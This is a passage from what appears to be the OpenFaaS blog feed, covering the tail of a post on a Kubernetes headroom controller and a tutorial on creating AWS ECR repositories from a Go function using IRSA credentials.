    <span class="na">runAsUser</span><span class="pi">:</span> <span class="m">1000</span>
    <span class="na">runAsGroup</span><span class="pi">:</span> <span class="m">1000</span>
    <span class="na">fsGroup</span><span class="pi">:</span> <span class="m">1000</span>
</code></pre></div></div>

<h3 id="tolerations-for-node-groups-and-spot-instances">Tolerations for node groups and spot instances</h3>

<p>Spot instances are used by many OpenFaaS customers in production for running functions. A taint is applied to the node group to prevent control plane workloads from running on them, then a toleration is required on the Function Pods to allow them to run on the node group. For Functions, this is achieved through a <a href="https://docs.openfaas.com/reference/profiles/">Profile</a>. Headroom resources specify tolerations directly in their <code class="language-plaintext highlighter-rouge">.spec</code>.</p>

<p>Here’s what we used during testing for AWS EKS with Karpenter, so that headroom Pods ran on spot instances.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">tolerations</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">key</span><span class="pi">:</span> <span class="s2">"</span><span class="s">karpenter.sh/node-group"</span>
      <span class="na">operator</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Equal"</span>
      <span class="na">value</span><span class="pi">:</span> <span class="s2">"</span><span class="s">spot"</span>
      <span class="na">effect</span><span class="pi">:</span> <span class="s2">"</span><span class="s">NoSchedule"</span>
</code></pre></div></div>

<p>For a self-hosted <a href="https://docs.slicervm.com/examples/ha-k3s/">HA K3s cluster with SlicerVM.com</a> running with our modified Cluster Autoscaler, you could try something like this:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl taint node k3s-cp-1 <span class="nb">cp</span>:NoSchedule
kubectl taint node k3s-cp-2 <span class="nb">cp</span>:NoSchedule
kubectl taint node k3s-cp-3 <span class="nb">cp</span>:NoSchedule
</code></pre></div></div>

<p>Or if there are no agents yet:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl taint node <span class="nt">--all</span> <span class="nb">cp</span>:NoSchedule
</code></pre></div></div>

<p>Followed by adding:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">spec</span><span class="pi">:</span>
  <span class="na">priorityClassName</span><span class="pi">:</span> <span class="s">headroom</span>
  <span class="na">replicas</span><span class="pi">:</span> <span class="m">2</span>
  <span class="na">requests</span><span class="pi">:</span>
    <span class="na">cpu</span><span class="pi">:</span> <span class="s">500m</span>
    <span class="na">memory</span><span class="pi">:</span> <span class="s">512Mi</span>
  <span class="na">tolerations</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">effect</span><span class="pi">:</span> <span class="s">NoSchedule</span>
    <span class="na">key</span><span class="pi">:</span> <span class="s">cp</span>
    <span class="na">operator</span><span class="pi">:</span> <span class="s">Exists</span>
</code></pre></div></div>

<p>In that case, if you have no agents, the autoscaler will provision a new node to host the two new replicas of the headroom Pods.</p>

<h2 id="getting-started-with-the-headroom-controller">Getting started with the headroom controller</h2>

<p>You can get started right away, even if you’re not an OpenFaaS customer. OpenFaaS is not a prerequisite, but we’ve put it under the OpenFaaS brand to signal that this is something we support, and think is an important add-on for any cluster autoscaler.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update
</code></pre></div></div>

<p>Write a <code class="language-plaintext highlighter-rouge">values-custom.yaml</code> file.</p>

<p>Decide whether you want it to run across all namespaces in the cluster:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">rbac</span><span class="pi">:</span>
  <span class="na">role</span><span class="pi">:</span> <span class="s">ClusterRole</span>
</code></pre></div></div>

<p>Or to operate only in the namespace given to helm via the <code class="language-plaintext highlighter-rouge">--namespace</code> flag.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">rbac</span><span class="pi">:</span>
  <span class="na">role</span><span class="pi">:</span> <span class="s">Role</span>
</code></pre></div></div>

<p>There are some other flags to play with, but the defaults should be fine for most use cases.</p>

<p>You could install it into the <code class="language-plaintext highlighter-rouge">kube-system</code> namespace, the <code class="language-plaintext highlighter-rouge">openfaas</code> namespace, or a custom one.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>helm upgrade <span class="nt">--install</span> headroom-controller openfaas/headroom-controller <span class="se">\</span>
	<span class="nt">--namespace</span> kube-system <span class="se">\</span>
	<span class="nt">-f</span> ./values-custom.yaml
</code></pre></div></div>

<p>Once you’ve got some confidence in how the controller works, you could add it to your GitOps repository with ArgoCD or Flux along with your other infrastructure tools such as cert-manager, ingress-nginx, external-secrets, and so forth.</p>
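<p>As an example of the GitOps route, a Flux HelmRelease for the chart might look something like the following sketch. The API versions and intervals are assumptions - adjust them for your Flux installation:</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>apiVersion: source.toolkit.fluxcd.io/v1
kind: HelmRepository
metadata:
  name: openfaas
  namespace: kube-system
spec:
  interval: 1h
  url: https://openfaas.github.io/faas-netes/
---
apiVersion: helm.toolkit.fluxcd.io/v2
kind: HelmRelease
metadata:
  name: headroom-controller
  namespace: kube-system
spec:
  interval: 10m
  chart:
    spec:
      chart: headroom-controller
      sourceRef:
        kind: HelmRepository
        name: openfaas
  values:
    rbac:
      role: ClusterRole
</code></pre></div></div>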

<h2 id="next-steps">Next steps</h2>

<p>Whilst this is a new project, we’ve tested it with <a href="https://karpenter.sh/">Karpenter</a> and <a href="https://github.com/kubernetes/autoscaler">Cluster Autoscaler</a>, and it worked as expected.</p>

<p>You will need to spend some time fine-tuning your Headroom resources to get the best performance for your clusters and applications.</p>

<p>Feel free to reach out with your comments, questions, and suggestions.</p>

<p>During the beta period, anyone can try out the Headroom Controller for free without signing up for a subscription.</p>

<p>After the beta period, OpenFaaS customers get free access to the Headroom Controller as part of their subscription. For everyone else, you can <a href="https://github.com/openfaas/faas-netes/blob/master/chart/headroom-controller/README.md">purchase a license</a> for 300 USD/year per cluster - which is less than 1 USD per day for near-instant scaling and scheduling of Pods.</p>

<p>Even if you wanted to make your own controller for fun, you have to factor in the continued maintenance and support, and what happens when you leave the company. We’ve priced the controller at the point where it makes sense to outsource it.</p>

<p>You may also like these past blog posts:</p>

<ul>
  <li><a href="/blog/eks-openfaas-karpenter/">Save costs on AWS EKS with OpenFaaS and Karpenter</a></li>
  <li><a href="/blog/eks-openfaas-karpenter-gpu/">Scale to zero GPUs with OpenFaaS, Karpenter and AWS EKS</a></li>
  <li><a href="/blog/build-and-scale-python-function/">How to Build and Scale Python Functions with OpenFaaS</a></li>
  <li><a href="/blog/add-a-faas-capability/">Integrate a FaaS capability into your product</a></li>
</ul>]]></content><author><name>OpenFaaS Ltd</name></author><category term="autoscaling" /><category term="kubernetes" /><category term="serverless" /><summary type="html"><![CDATA[Does it take 1-2 minutes for new nodes to get added to your cluster? Add some headroom for an instant Pod start.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://www.openfaas.com/images/2025-07-headroom/background.png" /><media:content medium="image" url="https://www.openfaas.com/images/2025-07-headroom/background.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">Manage AWS Resources from OpenFaaS Functions With IRSA</title><link href="https://www.openfaas.com/blog/irsa-functions/" rel="alternate" type="text/html" title="Manage AWS Resources from OpenFaaS Functions With IRSA" /><published>2025-07-09T00:00:00+00:00</published><updated>2025-07-09T00:00:00+00:00</updated><id>https://www.openfaas.com/blog/irsa-functions</id><content type="html" xml:base="https://www.openfaas.com/blog/irsa-functions/"><![CDATA[<p>In this post we’ll create a function in Golang that uses AWS IAM and ambient credentials to create and manage resources in AWS.</p>

<p>As a built-in offering, AWS Lambda is often used to respond to events and to manage AWS resources, so how does OpenFaaS compare?</p>

<p>OpenFaaS is a self-hosted platform that can run on any cloud or on-premises, including AWS EKS. Whilst AWS Lambda is a popular and convenient offering, it does have some tradeoffs and limitations which can cause friction for teams with more specialised requirements, workflows, or high usage ($$$).</p>

<p>If your team is developing code for Kubernetes using AWS EKS, then OpenFaaS can be a more natural fit than AWS Lambda, since it can use the same workflows, tools and processes you already have in place for your existing Kubernetes applications. That includes Helm, CRDs, Kubernetes RBAC, container builders in CI/CD and ArgoCD/Flux.</p>

<p>Both AWS Lambda and OpenFaaS can be used to manage resources within AWS, with either shared credentials which need to be created, managed and rotated by your team, or with ambient credentials which are automatically obtained at runtime by the function.</p>

<p>Our function will be used to create repositories in Elastic Container Registry (ECR). This is a common task for teams that run <a href="https://www.openfaas.com/blog/build-a-multi-tenant-functions-platform/">OpenFaaS in a multi-tenant environment</a>, where each tenant or team publishes their own functions to the platform. It’ll receive credentials using IAM Roles for Service Accounts (IRSA), which is the most modern way to map Kubernetes Service Accounts to native AWS IAM roles.</p>

<p>Contents:</p>

<ul>
  <li><a href="#create-an-eks-cluster-with-irsa-enabled">Create an EKS cluster with IRSA enabled</a></li>
  <li><a href="#install-openfaas-standard-or-for-enterprises">Install OpenFaaS Standard or For Enterprises</a></li>
  <li><a href="#iam-policy-for-ecr-access">IAM Policy for ECR Access</a></li>
  <li><a href="#create-iam-role-and-service-account">Create IAM Role and Service Account</a></li>
  <li><a href="#create-a-function-that-uses-the-iam-role">Create a function that uses the IAM Role</a></li>
  <li><a href="#invoke-the-function-to-create-a-new-repository">Invoke the function to create a new repository</a></li>
  <li><a href="#wrapping-up-and-next-steps">Wrapping up and next steps</a></li>
</ul>

<h2 id="create-an-eks-cluster-with-irsa-enabled">Create an EKS cluster with IRSA enabled</h2>

<p>You may already have an AWS EKS cluster provisioned, if so, you can enable IRSA by following these instructions: <a href="https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html">IRSA on EKS</a>.</p>

<p>If not, we can create a quick cluster using the <a href="https://eksctl.io/">eksctl CLI tool</a>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>eksctl create cluster <span class="se">\</span>
    <span class="nt">--name</span> of-test <span class="se">\</span>
    <span class="nt">--with-oidc</span> <span class="se">\</span>
    <span class="nt">--spot</span> <span class="se">\</span>
    <span class="nt">--nodes</span> 1 <span class="se">\</span>
    <span class="nt">--nodes-max</span> 3 <span class="se">\</span>
    <span class="nt">--nodes-min</span> 1 <span class="se">\</span>
    <span class="nt">--region</span> eu-west-1
</code></pre></div></div>

<p>Whilst eksctl looks like an imperative CLI tool, it is a client that manages declarative CloudFormation templates under the hood. You’ll see the one created for your cluster by navigating to the CloudFormation page of the AWS console. Provisioning can take 15-20 minutes depending on how many nodes and add-ons you’ve selected.</p>

<h2 id="install-openfaas-standard-or-for-enterprises">Install OpenFaaS Standard or For Enterprises</h2>

<p>If you don’t have OpenFaaS installed, you can follow the <a href="https://docs.openfaas.com/deployment/pro/">OpenFaaS installation guide</a>. If you already have OpenFaaS installed, you can skip this step.</p>

<p>For experimentation, you can use port-forwarding instead of setting up DNS and Ingress for the OpenFaaS gateway. It’ll make it a bit quicker to get started.</p>

<h2 id="iam-policy-for-ecr-access">IAM Policy for ECR Access</h2>

<p>We need to create an IAM Policy that will allow the OpenFaaS function to create and query repositories in ECR.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
        </span><span class="s2">"ecr:CreateRepository"</span><span class="p">,</span><span class="w">
        </span><span class="s2">"ecr:DeleteRepository"</span><span class="p">,</span><span class="w">
        </span><span class="s2">"ecr:DescribeRepositories"</span><span class="w">
      </span><span class="p">],</span><span class="w">
      </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"*"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>You can create this role using the AWS CLI or the AWS Management Console. If you’re using the CLI, you can run the following command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam create-policy <span class="se">\</span>
  <span class="nt">--policy-name</span> ecr-create-query-repository <span class="se">\</span>
  <span class="nt">--policy-document</span> file://ecr-policy.json
</code></pre></div></div>

<p>Note down the ARN returned in the response, e.g.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "Policy": {
        "PolicyName": "ecr-create-query-repository",
        "Arn": "arn:aws:iam::ACCOUNT_NUMBER:policy/ecr-create-query-repository"
    }
}
</code></pre></div></div>

<h2 id="create-iam-role-and-service-account">Create IAM Role and Service Account</h2>

<p>The easiest way to create the IAM Role and Service Account is to use <code class="language-plaintext highlighter-rouge">eksctl</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">ARN</span><span class="o">=</span>arn:aws:iam::ACCOUNT_NUMBER:policy/ecr-create-query-repository

eksctl create iamserviceaccount <span class="se">\</span>
  <span class="nt">--name</span> openfaas-create-ecr-repo <span class="se">\</span>
  <span class="nt">--namespace</span> openfaas-fn <span class="se">\</span>
  <span class="nt">--cluster</span> of-test <span class="se">\</span>
  <span class="nt">--role-name</span> ecr-create-query-repository <span class="se">\</span>
  <span class="nt">--attach-policy-arn</span> <span class="nv">$ARN</span> <span class="se">\</span>
  <span class="nt">--region</span> eu-west-1 <span class="se">\</span>
  <span class="nt">--approve</span>
</code></pre></div></div>

<p>This can also be done manually by creating the IAM Role in AWS, followed by a correctly annotated Service Account in Kubernetes using the <code class="language-plaintext highlighter-rouge">eks.amazonaws.com/role-arn</code> annotation.</p>
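<p>For reference, the manually-created Service Account would look something like the following. This is a sketch that assumes the role name from the <code class="language-plaintext highlighter-rouge">eksctl</code> command above:</p>

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: openfaas-create-ecr-repo
  namespace: openfaas-fn
  annotations:
    # IRSA: tells the EKS webhook which IAM Role to project credentials for
    eks.amazonaws.com/role-arn: arn:aws:iam::ACCOUNT_NUMBER:role/ecr-create-query-repository
```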

<h2 id="create-a-function-that-uses-the-iam-role">Create a function that uses the IAM Role</h2>

<p>We are going to use Go to create this function. You can learn more about the Go template in the <a href="https://docs.openfaas.com/languages/go/">OpenFaaS documentation</a>.</p>

<p>AWS also has <a href="https://docs.aws.amazon.com/sdkref/latest/guide/overview.html">SDKs available for other languages</a> supported by OpenFaaS such as Python, Java, Node.js, C#, etc.</p>

<p>Create a new function using the <code class="language-plaintext highlighter-rouge">golang-middleware</code> template:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">export </span><span class="nv">OPENFAAS_PREFIX</span><span class="o">=</span>ttl.sh/openfaas

faas-cli new <span class="nt">--lang</span> golang-middleware ecr-create-repo
</code></pre></div></div>

<p>Edit the stack.yaml file to add an annotation stating which Kubernetes Service Account to use:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">functions:
</span>  ecr-create-repo:
<span class="gi">+    annotations:
+      com.openfaas.serviceaccount: openfaas-create-ecr-repo
</span></code></pre></div></div>

<p>Set the AWS region for the function via an environment variable:</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">functions:
</span>  ecr-create-repo:
<span class="gi">+    environment:
+      AWS_REGION: eu-west-1
</span></code></pre></div></div>

<p>Add the AWS SDK for Go to the function as a dependency:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cd </span>ecr-create-repo
go get github.com/aws/aws-sdk-go-v2/aws
go get github.com/aws/aws-sdk-go-v2/config
go get github.com/aws/aws-sdk-go-v2/service/ecr
</code></pre></div></div>

<p>You can learn more about the AWS SDK for Go in the <a href="https://docs.aws.amazon.com/sdk-for-go/v2/developer-guide/welcome.html">AWS documentation</a>.</p>

<p>Edit the function’s handler to use the AWS SDK for Go:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">package</span> <span class="n">function</span>

<span class="k">import</span> <span class="p">(</span>
	<span class="s">"context"</span>
	<span class="s">"encoding/json"</span>
	<span class="s">"fmt"</span>
	<span class="s">"io"</span>
	<span class="s">"log"</span>
	<span class="s">"net/http"</span>
	<span class="s">"os"</span>
	<span class="s">"strings"</span>

	<span class="s">"github.com/aws/aws-sdk-go-v2/config"</span>
	<span class="s">"github.com/aws/aws-sdk-go-v2/service/ecr"</span>
	<span class="s">"github.com/aws/aws-sdk-go-v2/service/ecr/types"</span>
<span class="p">)</span>

<span class="k">type</span> <span class="n">CreateRepoReq</span> <span class="k">struct</span> <span class="p">{</span>
	<span class="n">Name</span> <span class="kt">string</span> <span class="s">`json:"name"`</span>
<span class="p">}</span>

<span class="k">type</span> <span class="n">CreateRepoRes</span> <span class="k">struct</span> <span class="p">{</span>
	<span class="n">Arn</span> <span class="kt">string</span> <span class="s">`json:"arn"`</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">Handle</span><span class="p">(</span><span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">var</span> <span class="n">input</span> <span class="p">[]</span><span class="kt">byte</span>

	<span class="k">if</span> <span class="n">r</span><span class="o">.</span><span class="n">Body</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="k">defer</span> <span class="n">r</span><span class="o">.</span><span class="n">Body</span><span class="o">.</span><span class="n">Close</span><span class="p">()</span>

		<span class="n">body</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">ReadAll</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">Body</span><span class="p">)</span>
		<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
			<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"Failed to read request body"</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusBadRequest</span><span class="p">)</span>
			<span class="k">return</span>
		<span class="p">}</span>

		<span class="n">input</span> <span class="o">=</span> <span class="n">body</span>
	<span class="p">}</span>

	<span class="k">var</span> <span class="n">createRepoReq</span> <span class="n">CreateRepoReq</span>
	<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">input</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">0</span> <span class="p">{</span>
		<span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">createRepoReq</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
			<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"Invalid request body"</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusBadRequest</span><span class="p">)</span>
			<span class="k">return</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">createRepoReq</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span> <span class="o">==</span> <span class="m">0</span> <span class="p">{</span>
		<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"Missing in body: name"</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusBadRequest</span><span class="p">)</span>
		<span class="k">return</span>
	<span class="p">}</span>

	<span class="n">cfg</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">config</span><span class="o">.</span><span class="n">LoadDefaultConfig</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">TODO</span><span class="p">(),</span>
		<span class="n">config</span><span class="o">.</span><span class="n">WithRegion</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">Getenv</span><span class="p">(</span><span class="s">"AWS_REGION"</span><span class="p">)))</span>
	<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="c">// Avoid log.Fatalf here: it would exit the whole process on a single failed request</span>
		<span class="n">log</span><span class="o">.</span><span class="n">Printf</span><span class="p">(</span><span class="s">"unable to load SDK config: %s"</span><span class="p">,</span> <span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">())</span>
		<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="s">"Failed to load AWS SDK config"</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusInternalServerError</span><span class="p">)</span>
		<span class="k">return</span>
	<span class="p">}</span>

	<span class="c">// Using the Config value, create the ECR client</span>
	<span class="n">svc</span> <span class="o">:=</span> <span class="n">ecr</span><span class="o">.</span><span class="n">NewFromConfig</span><span class="p">(</span><span class="n">cfg</span><span class="p">)</span>

	<span class="c">// Check if the repository already exists</span>
	<span class="k">if</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">svc</span><span class="o">.</span><span class="n">DescribeRepositories</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">TODO</span><span class="p">(),</span> <span class="o">&amp;</span><span class="n">ecr</span><span class="o">.</span><span class="n">DescribeRepositoriesInput</span><span class="p">{</span>
		<span class="n">RepositoryNames</span><span class="o">:</span> <span class="p">[]</span><span class="kt">string</span><span class="p">{</span><span class="n">createRepoReq</span><span class="o">.</span><span class="n">Name</span><span class="p">},</span>
	<span class="p">});</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="n">log</span><span class="o">.</span><span class="n">Printf</span><span class="p">(</span><span class="s">"Error describing repository: %s"</span><span class="p">,</span> <span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">())</span>
		<span class="k">if</span> <span class="o">!</span><span class="n">strings</span><span class="o">.</span><span class="n">Contains</span><span class="p">(</span><span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">(),</span> <span class="s">"RepositoryNotFoundException"</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"Failed to describe repository: %s"</span><span class="p">,</span> <span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">()),</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusInternalServerError</span><span class="p">)</span>
			<span class="k">return</span>
		<span class="p">}</span>
	<span class="p">}</span>

	<span class="c">// Create the repository</span>
	<span class="n">createRes</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">svc</span><span class="o">.</span><span class="n">CreateRepository</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">TODO</span><span class="p">(),</span> <span class="o">&amp;</span><span class="n">ecr</span><span class="o">.</span><span class="n">CreateRepositoryInput</span><span class="p">{</span>
		<span class="n">RepositoryName</span><span class="o">:</span>     <span class="o">&amp;</span><span class="n">createRepoReq</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span>
		<span class="n">ImageTagMutability</span><span class="o">:</span> <span class="n">types</span><span class="o">.</span><span class="n">ImageTagMutabilityMutable</span><span class="p">,</span>
		<span class="n">EncryptionConfiguration</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">types</span><span class="o">.</span><span class="n">EncryptionConfiguration</span><span class="p">{</span>
			<span class="n">EncryptionType</span><span class="o">:</span> <span class="n">types</span><span class="o">.</span><span class="n">EncryptionTypeAes256</span><span class="p">,</span>
		<span class="p">},</span>
		<span class="n">ImageScanningConfiguration</span><span class="o">:</span> <span class="o">&amp;</span><span class="n">types</span><span class="o">.</span><span class="n">ImageScanningConfiguration</span><span class="p">{</span>
			<span class="n">ScanOnPush</span><span class="o">:</span> <span class="no">false</span><span class="p">,</span>
		<span class="p">},</span>
	<span class="p">})</span>
	<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
		<span class="n">http</span><span class="o">.</span><span class="n">Error</span><span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"Failed to create repository: %s"</span><span class="p">,</span> <span class="n">err</span><span class="o">.</span><span class="n">Error</span><span class="p">()),</span> <span class="n">http</span><span class="o">.</span><span class="n">StatusInternalServerError</span><span class="p">)</span>
		<span class="k">return</span>
	<span class="p">}</span>

	<span class="n">w</span><span class="o">.</span><span class="n">WriteHeader</span><span class="p">(</span><span class="n">http</span><span class="o">.</span><span class="n">StatusCreated</span><span class="p">)</span>

	<span class="n">createRepoRes</span> <span class="o">:=</span> <span class="n">CreateRepoRes</span><span class="p">{</span>
		<span class="n">Arn</span><span class="o">:</span> <span class="o">*</span><span class="n">createRes</span><span class="o">.</span><span class="n">Repository</span><span class="o">.</span><span class="n">RepositoryArn</span><span class="p">,</span>
	<span class="p">}</span>
	<span class="n">json</span><span class="o">.</span><span class="n">NewEncoder</span><span class="p">(</span><span class="n">w</span><span class="p">)</span><span class="o">.</span><span class="n">Encode</span><span class="p">(</span><span class="n">createRepoRes</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="invoke-the-function-to-create-a-new-repository">Invoke the function to create a new repository</h2>

<p>Now you can use curl to create a repository:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://127.0.0.1:8080/function/ecr-create-repo <span class="se">\</span>
  <span class="nt">-d</span> <span class="s1">'{"name":"tenant1/fn1"}'</span> <span class="se">\</span>
  <span class="nt">-H</span> <span class="s2">"Content-type: application/json"</span>
</code></pre></div></div>

<p>The response contains the ARN of the repository, ready for you to use in something like the OpenFaaS Function Builder API to push a new image.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"arn"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:ecr:eu-west-1:ACCOUNT_NUMBER:repository/tenant1/fn1"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>You should see the repository created in the AWS Console.</p>

<p>You can also verify this from the command line:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr list-images <span class="nt">--repository-name</span> tenant1/fn1 <span class="nt">--region</span> eu-west-1

aws ecr describe-repositories <span class="nt">--repository-name</span> tenant1/fn1 <span class="nt">--region</span> eu-west-1
</code></pre></div></div>

<h2 id="wrapping-up-and-next-steps">Wrapping up and next steps</h2>

<p>In a very short period of time, we created a function using the <code class="language-plaintext highlighter-rouge">golang-middleware</code> template, added the AWS SDK for Go as a dependency, and used it to create a repository in ECR.</p>

<p>This is a required step before pushing new images to an AWS ECR registry, and it could form part of a CI/CD pipeline, or a multi-tenant functions platform.</p>

<p>With a few simple steps, you can take code in the form of plain files, a zip file, a tar file, or a Git repository, and turn it into a function.</p>

<ol>
  <li>Create a tenant namespace using the <a href="https://docs.openfaas.com/reference/rest-api/#create-a-namespace">OpenFaaS Gateway’s REST API</a> i.e. <code class="language-plaintext highlighter-rouge">tenant1</code></li>
  <li>Create a repository for the tenant’s new function you want to build i.e. <code class="language-plaintext highlighter-rouge">tenant1/fn1</code></li>
  <li>Use the <a href="https://docs.openfaas.com/openfaas-pro/builder/">Function Builder’s API</a> to publish the image to the full ARN path i.e. <code class="language-plaintext highlighter-rouge">ACCOUNT_NUMBER.dkr.ecr.eu-west-1.amazonaws.com/tenant1/fn1:TAG</code></li>
  <li>Post a request to the <a href="https://docs.openfaas.com/reference/rest-api/#deploy-a-function">OpenFaaS Gateway’s REST API</a> to deploy the function to the <code class="language-plaintext highlighter-rouge">tenant1</code> namespace</li>
</ol>

<p>Highlights of this approach:</p>

<ul>
  <li>The function operates with AWS IAM, using least privilege principles.</li>
  <li>The function obtains ambient credentials from the Kubernetes Service Account, using IRSA instead of shared, long-lived credentials.</li>
  <li>The function can be deployed to Kubernetes rapidly using the same workflows and tools you already use with Kubernetes.</li>
</ul>

<p>To take things further, consider these authentication options for the function:</p>

<ol>
  <li><a href="https://docs.openfaas.com/openfaas-pro/iam/function-authentication/">Built-in Function Authentication using OpenFaaS IAM</a>.</li>
  <li>Your own code in the handler to process an Authorization header with a static key or JWT token.</li>
</ol>

<p>We wrote to the AWS API directly; however, you can also use the <a href="https://docs.openfaas.com/openfaas-pro/sqs-events/">Event Connectors for AWS SQS or SNS</a> to receive events from other AWS services such as S3, DynamoDB, etc.</p>

<p>The same technique can be applied for other APIs such as the Kubernetes API, for when you want a function to obtain an identity to manage resources in one or more Kubernetes clusters: <a href="https://www.openfaas.com/blog/access-kubernetes-from-a-function/">Learn how to access the Kubernetes API from a Function</a>.</p>

<p>You may also like to learn how to run OpenFaaS as a multi-tenant platform:</p>

<ul>
